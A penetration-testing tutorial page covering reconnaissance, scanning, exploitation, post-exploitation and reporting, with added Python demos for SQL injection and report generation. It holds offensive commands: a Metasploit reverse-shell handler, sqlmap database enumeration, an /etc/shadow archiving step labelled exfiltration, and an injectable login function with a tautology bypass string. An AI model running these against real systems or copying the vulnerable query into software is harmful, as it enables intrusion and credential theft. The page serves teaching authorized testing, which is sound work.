# Penetration Testing

Testing methodologies, tools, reconnaissance, exploitation, and reporting.

## Overview

Penetration testing is an authorized, scoped assessment that identifies exploitable vulnerabilities before attackers do.

## Testing Methodology
### 1. Reconnaissance

```shell
# Passive reconnaissance (public records only, no packets sent to the target)
whois target.com
nslookup target.com
dig target.com ANY          # many resolvers refuse ANY; query A, MX, NS, TXT separately if so
# Active reconnaissance (touches the target directly)
nmap -sV -sC target.com     # service versions plus default NSE scripts
nikto -h target.com         # web server misconfiguration scan
```
### 2. Scanning

```shell
# Port scanning
nmap -p- -T4 target.com                 # all 65535 TCP ports
nmap -sU --top-ports 100 target.com     # the 100 most common UDP ports
# Vulnerability scanning
# Nessus and OpenVAS are driven from their web console or API rather than a
# one-line command; the two lines below stand for "run a scan of target.com".
nessus target.com
openvas target.com
```
### 3. Exploitation

```shell
# Metasploit: start a handler that waits for a reverse Meterpreter session
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100     # the tester's own address, where the session calls back
exploit
# SQL injection: enumerate databases reachable through an injectable parameter
sqlmap -u "http://target.com/page?id=1" --dbs
```
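What sqlmap is probing for, and the parameterized-query fix the report will recommend, side by side. This is an added example written for this page, not code from the original or from sqlmap; it uses an in-memory SQLite table with a constructed user record, and the `login_*` function names and the `BYPASS` string are the example's own.

```python
import sqlite3

# Constructed sample data for the demonstration: one user in an in-memory database.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    # Vulnerable: user input is pasted into the SQL text, so a quote inside the
    # input changes the query's structure. This is the defect sqlmap looks for.
    query = (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return conn.execute(query).fetchone() is not None

def login_parameterized(conn, username, password):
    # Hardened: placeholders hand the values to the driver as data, so the
    # same input can never be interpreted as SQL.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None

# Textbook tautology that turns the WHERE clause into "... OR '1'='1'".
BYPASS = "' OR '1'='1"

def demo():
    """Return each login variant's result for a valid password and for BYPASS."""
    conn = make_db()
    return {
        "vuln_valid": login_vulnerable(conn, "alice", "correct-horse"),
        "vuln_bypass": login_vulnerable(conn, "alice", BYPASS),
        "param_valid": login_parameterized(conn, "alice", "correct-horse"),
        "param_bypass": login_parameterized(conn, "alice", BYPASS),
    }

if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'login accepted' if ok else 'login rejected'}")
```

The vulnerable variant accepts the tautology because `AND` binds tighter than `OR`, leaving `'1'='1'` as the deciding condition; the parameterized variant rejects it because the driver compares the literal string `' OR '1'='1` against the stored password. The same pattern applies to any driver that supports bound parameters; the fix is never to escape quotes by hand.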
### 4. Post-Exploitation

```shell
# Privilege escalation
sudo -l                              # commands the current user may run through sudo
find / -perm -4000 2>/dev/null       # setuid binaries
# Data exfiltration
tar czf /tmp/data.tar.gz /etc/shadow
```
## Testing Types
| Type | Scope | Authorization |
|---|---|---|
| Black Box | No knowledge | Full |
| White Box | Full knowledge | Full |
| Gray Box | Partial knowledge | Full |
| Red Team | Adversary simulation | Full |
## Common Tools
| Tool | Purpose |
|---|---|
| Nmap | Network scanning |
| Metasploit | Exploitation framework |
| Burp Suite | Web application testing |
| John the Ripper | Password cracking |
| Wireshark | Packet analysis |
| Aircrack-ng | Wireless testing |
## Reporting Template

```markdown
# Penetration Test Report

## Executive Summary
- Test Date: YYYY-MM-DD
- Scope: [systems tested]
- Overall Risk: [High/Medium/Low]

## Findings

### Critical: SQL Injection
- Location: /login.php
- Impact: Database compromise
- Remediation: Use parameterized queries

### Medium: Weak Password Policy
- Location: User accounts
- Impact: Account compromise
- Remediation: Enforce complex passwords

## Recommendations
1. Implement input validation
2. Enable multi-factor authentication
3. Regular security training
```
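A small generator for the template above, added here as an example and not part of the original page: findings are validated against a fixed severity scale, ordered worst-first, and the executive summary's overall risk is derived from the most severe finding instead of being typed by hand. The `Finding` class, the severity tables and the sample findings (taken from the template) are this example's own assumptions.

```python
from dataclasses import dataclass

# Per-finding severities, ranked so the worst one can be picked mechanically.
SEVERITY_ORDER = {"Critical": 4, "High": 3, "Medium": 2, "Low": 1, "Info": 0}
# The template's summary uses a three-step High/Medium/Low scale; Critical folds into High.
OVERALL_RISK = {"Critical": "High", "High": "High", "Medium": "Medium", "Low": "Low", "Info": "Low"}

@dataclass
class Finding:
    severity: str
    title: str
    location: str
    impact: str
    remediation: str

    def __post_init__(self):
        # Reject typos such as "Crit" early so the summary risk can be trusted.
        if self.severity not in SEVERITY_ORDER:
            raise ValueError(f"unknown severity: {self.severity!r}")

def overall_risk(findings):
    """Summary risk is driven by the single most severe finding; no findings means Low."""
    if not findings:
        return "Low"
    worst = max(findings, key=lambda f: SEVERITY_ORDER[f.severity])
    return OVERALL_RISK[worst.severity]

def render_report(test_date, scope, findings, recommendations):
    """Render the page's markdown template, findings ordered worst-first."""
    ordered = sorted(findings, key=lambda f: SEVERITY_ORDER[f.severity], reverse=True)
    lines = [
        "# Penetration Test Report", "",
        "## Executive Summary",
        f"- Test Date: {test_date}",
        f"- Scope: {scope}",
        f"- Overall Risk: {overall_risk(findings)}", "",
        "## Findings", "",
    ]
    for f in ordered:
        lines += [
            f"### {f.severity}: {f.title}",
            f"- Location: {f.location}",
            f"- Impact: {f.impact}",
            f"- Remediation: {f.remediation}", "",
        ]
    lines.append("## Recommendations")
    lines += [f"{i}. {rec}" for i, rec in enumerate(recommendations, 1)]
    return "\n".join(lines) + "\n"

# Constructed sample input: the two findings from the template, deliberately
# listed least-severe first to show that rendering reorders them.
SAMPLE_FINDINGS = [
    Finding("Medium", "Weak Password Policy", "User accounts",
            "Account compromise", "Enforce complex passwords"),
    Finding("Critical", "SQL Injection", "/login.php",
            "Database compromise", "Use parameterized queries"),
]
SAMPLE_RECOMMENDATIONS = [
    "Implement input validation",
    "Enable multi-factor authentication",
    "Regular security training",
]

def sample_report():
    return render_report("2024-01-31", "lab web application",
                         SAMPLE_FINDINGS, SAMPLE_RECOMMENDATIONS)

if __name__ == "__main__":
    print(sample_report())
```

Deriving the summary risk from the findings keeps the executive summary consistent with the body when findings are added or re-rated late in the engagement, which is the most common inconsistency reviewers catch in hand-edited reports.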
## Practice

Conduct a penetration test on a vulnerable lab environment such as HackTheBox.